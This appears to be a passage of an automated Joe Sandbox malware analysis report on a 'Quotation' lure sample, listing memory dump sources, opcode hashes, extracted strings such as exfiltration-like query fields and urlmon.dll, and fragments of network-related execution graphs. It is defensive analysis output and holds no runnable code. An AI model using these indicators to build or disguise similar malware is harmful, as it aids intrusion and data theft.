                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0c7957ecc0acb40f5636081356ebde4428d624f663dba70dc4b468e48d7cbffe
                                          • Instruction ID: 0d7f75ad45be9b499b1514e0083b1f219b7ad470c207000f1853693870aebfdc
                                          • Opcode Fuzzy Hash: 0c7957ecc0acb40f5636081356ebde4428d624f663dba70dc4b468e48d7cbffe
                                          • Instruction Fuzzy Hash: 8D90022130140412D20271598814646000DC7D1385F95C023E1425595E8A298A53F932
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f66fdb74c97c212ac053cef237411ea26c9fc936f60f2eb5cd13eb969f5fcc4a
                                          • Instruction ID: a3f5f175dc953f226a751161c0bc6929de810481188910883c29e6d3e6f692bf
                                          • Opcode Fuzzy Hash: f66fdb74c97c212ac053cef237411ea26c9fc936f60f2eb5cd13eb969f5fcc4a
                                          • Instruction Fuzzy Hash: 03900221211C0052D30075698C14B47000D87D0343F55C126A0155594DCD198962AD21
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 847790d0c64aeec137b49fa71e9ea481c3df5c347489b1fe1814a01f52f003fe
                                          • Instruction ID: 9b3a390038f3b97a0f922e78a8311a8692b3e8ebf25e05a264ba4de482bb5316
                                          • Opcode Fuzzy Hash: 847790d0c64aeec137b49fa71e9ea481c3df5c347489b1fe1814a01f52f003fe
                                          • Instruction Fuzzy Hash: 129002216014005242407169CC44946400DABE1351755C132A0999590E895D8966AE65
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 74c31c48933dc7f2d4d7b7e5dcf931657c4ed6a9750ce9406ddf8edac8ac605b
                                          • Instruction ID: 0fb0b2837b44dbeecad21fde48569d0c1e18a655cb8a7f054254cdf80f8bbdba
                                          • Opcode Fuzzy Hash: 74c31c48933dc7f2d4d7b7e5dcf931657c4ed6a9750ce9406ddf8edac8ac605b
                                          • Instruction Fuzzy Hash: 1A90023120180412D20071598C08787000D87D0342F55C022A5165595F8A69C992BD31
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5f60483de2ef7765f4968eb815545a43e4737056ecbce2a1b17faffc6a968f4f
                                          • Instruction ID: 887a1f407d9db5bf11e5e139546073e63f3776fe66696f8aa186f14c332347a2
                                          • Opcode Fuzzy Hash: 5f60483de2ef7765f4968eb815545a43e4737056ecbce2a1b17faffc6a968f4f
                                          • Instruction Fuzzy Hash: F390023120180412D20071598C1474B000D87D0342F55C022A1165595E8A298952BD71
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d8ed814cd5f47c370b2dff9909b3ffce74106b2ae55f279f0408bc76cab82208
                                          • Instruction ID: 657ed43ca1a61185b360c4b11954b8883195dfd9ca8b07feef61e04b9b85620f
                                          • Opcode Fuzzy Hash: d8ed814cd5f47c370b2dff9909b3ffce74106b2ae55f279f0408bc76cab82208
                                          • Instruction Fuzzy Hash: EB90026121140052D20471598804746004D87E1341F55C023A2155594DC92D8D62A925
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9fcf638fdc37dda32021ac48a7fe9d18b0a620b274f9024878eb31d8735f38f2
                                          • Instruction ID: 2bfe9e62c3087893bed50c4e1b9921ad277aac15ca5935519d4a37fbe67f546d
                                          • Opcode Fuzzy Hash: 9fcf638fdc37dda32021ac48a7fe9d18b0a620b274f9024878eb31d8735f38f2
                                          • Instruction Fuzzy Hash: 4490026134140452D20071598814B46000DC7E1341F55C026E1065594E8A1DCD53B926
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          Strings
                                          • ExecuteOptions, xrefs: 00FD46A0
                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00FD4725
                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00FD4742
                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00FD4655
                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 00FD4787
                                          • Execute=1, xrefs: 00FD4713
                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00FD46FC
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                          • API String ID: 0-484625025
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: __aulldvrm
                                          • String ID: +$-$0$0
                                          • API String ID: 1302938615-699404926
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$[$]:%u
                                          • API String ID: 48624451-2819853543
                                          Strings
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00FD02E7
                                          • RTL: Re-Waiting, xrefs: 00FD031E
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00FD02BD
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                          • API String ID: 0-2474120054
                                          Strings
                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00FD7B7F
                                          • RTL: Re-Waiting, xrefs: 00FD7BAC
                                          • RTL: Resource at %p, xrefs: 00FD7B8E
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 0-871070163
                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD728C
                                          Strings
                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00FD7294
                                          • RTL: Re-Waiting, xrefs: 00FD72C1
                                          • RTL: Resource at %p, xrefs: 00FD72A3
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-605551621
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$]:%u
                                          • API String ID: 48624451-3050659472
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: __aulldvrm
                                          • String ID: +$-
                                          • API String ID: 1302938615-2137968064
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $$@
                                          • API String ID: 0-1194432280
                                          APIs
                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 00FECFBD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: CallFilterFunc@8
                                          • String ID: @$@4Cw@4Cw
                                          • API String ID: 4062629308-3101775584

                                          Execution Graph

                                          Execution Coverage: 3.6%
                                          Dynamic/Decrypted Code Coverage: 0%
                                          Signature Coverage: 0%
                                          Total number of Nodes: 36
                                          Total number of Limit Nodes: 5
                                          [Execution graph edge list omitted; API calls labelled on its nodes: closesocket, setsockopt]
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4575428088.0000000005800000.00000040.80000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_5800000_uExImirYECsTjI.jbxd
                                          Yara matches

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: !b$,$,$53$?\$CD$E$N+$Q$R!$R{$W$^$eC$f$h+$l$l$lM$q$ze$~$~$1
                                          • API String ID: 0-1739146893

                                          Control-flow Graph

                                          APIs
                                          • setsockopt.WS2_32(000000FF,0000FFFF,00001006,?,00000004), ref: 058150B6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4575428088.0000000005800000.00000040.80000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_5800000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: setsockopt
                                          • String ID: &br=9$&un=$80$dat=
                                          • API String ID: 3981526788-3709368510
                                          • Opcode ID: 5816a91d4c5ae5aad9ff0e861120210a4e10006d7c3255f4efa05dfbd32dbd6a
                                          • Instruction ID: 7dc63641dd7c1c2bc5c71b98dffab0257afd9a542093d85d6d9e543f06df38db
                                          • Opcode Fuzzy Hash: 5816a91d4c5ae5aad9ff0e861120210a4e10006d7c3255f4efa05dfbd32dbd6a
                                          • Instruction Fuzzy Hash: 4C42A1B1A04305AFDB24DFA8C884EEEB3B9EF44304F14856EED5AD7251E730A944CB95

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 6$S$\$s$ZPK
                                          • API String ID: 0-1238618981
                                          • Opcode ID: a025cb78f3ecfb636ef1180e8162f70fd6d0c5a15ccb261762b7497a3fc1a509
                                          • Instruction ID: 40aabd6aa33cb0aa9b2734cd8205b30f219e7e1a961505867a2794858345f01b
                                          • Opcode Fuzzy Hash: a025cb78f3ecfb636ef1180e8162f70fd6d0c5a15ccb261762b7497a3fc1a509
                                          • Instruction Fuzzy Hash: E95183B2D00219ABDB11EF94DD89BEEB3BDEF84714F0441A9E90D67100E7B15A048FE1

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 317 58385c9-5838600 call 5810559 call 58391c9 closesocket
                                          APIs
                                          • closesocket.WS2_32(0581515B,058368A7,?,?,0581515B,?,000000FF), ref: 058385FB
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4575428088.0000000005800000.00000040.80000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_5800000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: closesocket
                                          • String ID:
                                          • API String ID: 2781271927-0
                                          • Opcode ID: 382923b2ddc5e64463bb82babed39c85e58a14cb120f0261bcdc8cc6e96b3e32
                                          • Instruction ID: cbcdc30bb34e0aa4351ad69221757d2df9e2b420f330c24bd148a49c87ecb62b
                                          • Opcode Fuzzy Hash: 382923b2ddc5e64463bb82babed39c85e58a14cb120f0261bcdc8cc6e96b3e32
                                          • Instruction Fuzzy Hash: 31E04636200214BBD210AAAAEC04DDB776CDBC6210B014416FE08A7200DA74BE1087F5

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 408 29b2216-29b2280 call 298e966 411 29b22b2-29b22b9 408->411 412 29b2282-29b228f call 29ae536 408->412 414 29b2294-29b22b1 call 298e7e6 412->414
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: ZPK
                                          • API String ID: 0-297889628
                                          • Opcode ID: 771ae4d058267aaec8ff42ff29729ea273fd69fc6ca17d0448b97ca3cd0e53bd
                                          • Instruction ID: ce23b8ac4c29b0793c9ab0440b92448c8595977a4685b348a619736aec146292
                                          • Opcode Fuzzy Hash: 771ae4d058267aaec8ff42ff29729ea273fd69fc6ca17d0448b97ca3cd0e53bd
                                          • Instruction Fuzzy Hash: 5021FEB6D01219AF8B50DFA9D8418EFB7F9EF88210F04456AE915E7200E7705A05CBE1

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 417 29b3556-29b35bf call 298e966 420 29b35ed-29b35f4 417->420 421 29b35c1-29b35ca call 299d536 417->421 423 29b35cf-29b35ec call 298e7e6 421->423
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: Dy
                                          • API String ID: 0-4229255526
                                          • Opcode ID: bccec4aa01fe6b9e4c826bd2947f93411203c7381e84fc6bce816bb49727fe1f
                                          • Instruction ID: 9dc53a79385cfd57c36f8ceeb1d0b94bb58d26638f960fa3651e740c631f8983
                                          • Opcode Fuzzy Hash: bccec4aa01fe6b9e4c826bd2947f93411203c7381e84fc6bce816bb49727fe1f
                                          • Instruction Fuzzy Hash: 1D11EFB6D0121DAF9F04DFA9D9409EEB7F9EF88214F04426EE919E7200E7715A04CFA1

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 508 299110b-2991110 509 29910ad-29910d4 508->509 510 2991112-2991153 508->510 511 29910d6-29910e9 call 29a4e16 509->511 512 2991156-2991168 call 29a4e16 510->512 519 29910eb-29910ee 511->519 520 29910fd-2991106 511->520 517 299116a-2991174 512->517 518 2991186-29911bf call 29b5826 512->518 517->512 521 2991176-2991185 517->521 525 29911c4-29911c9 518->525 523 29910f0-29910f4 519->523 524 29910f6-29910fc 519->524 523->511 523->524 525->521 526 29911cb-29911e7 call 29b5126 525->526 526->521 529 29911e9-299120c call 29b5906 526->529 529->521 532 2991212-2991235 call 29b5906 529->532 532->521 535 299123b-2991259 532->535
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e3d84043eac9cd2a077fb8075e428e69f283c11b5ae0593ce363bd2ed8f5a8d0
                                          • Instruction ID: 8d1919e1743a702fc761706001b1d00d2b34a85071c16871764a4343d2a9b56f
                                          • Opcode Fuzzy Hash: e3d84043eac9cd2a077fb8075e428e69f283c11b5ae0593ce363bd2ed8f5a8d0
                                          • Instruction Fuzzy Hash: 41510EB1910219ABDB14CF99DC81AEEBBBDFF49710F50415AFA18E7240E7719541CBA0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4575428088.0000000005800000.00000040.80000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_5800000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: N$%b$*$1$6L$<\$JW$Z$[Z$gi$i$D
                                          • API String ID: 0-408350142
                                          • Opcode ID: 37f6701ea084eda53657d3b46895474eb0c82b084461f711c10671399f48d9fe
                                          • Instruction ID: 6b9d620e05cc716024b3a122410b0abc133e84d6d87e8ddd6b41b899ce43772c
                                          • Opcode Fuzzy Hash: 37f6701ea084eda53657d3b46895474eb0c82b084461f711c10671399f48d9fe
                                          • Instruction Fuzzy Hash: 84C1A1B0E05219CFEB14CF98C894BADBBB6BF45308F208199D809BB245C7755985CF59
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                          • API String ID: 0-3248090998
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                          • API String ID: 0-1002149817
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: "YXE$#?&'$D^X\$D^X\EX]$D__E$EX]$K3?Z$SF8E$X\EX$YRFZ$Z\K&$[EY_$[XEZ$]KC $^EZP$^E[K$^Y]K$k
                                          • API String ID: 0-106748587
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $.$F$P$e$i$l$m$o$o$r$s$x$ZPK
                                          • API String ID: 0-3141071198
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: D$\$e$e$i$l$n$r$r$w$x
                                          • API String ID: 0-685823316
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: .$P$e$i$m$o$r$x
                                          • API String ID: 0-620024284
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: L$S$\$a$c$e$l$ZPK
                                          • API String ID: 0-2546773622
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $i$l$o$u$ZPK
                                          • API String ID: 0-870066133
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: F$P$T$f$r$x
                                          • API String ID: 0-2523166886
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $i$l$o$u$ZPK
                                          • API String ID: 0-870066133
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $e$k$o$ZPK
                                          • API String ID: 0-2374797950
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $e$h$o
                                          • API String ID: 0-3662636641
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: )$USL$W$YvSr
                                          • API String ID: 0-3047499500
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                          • API String ID: 0-2877786613
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                          • API String ID: 0-2877786613
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 2$L$Z$i
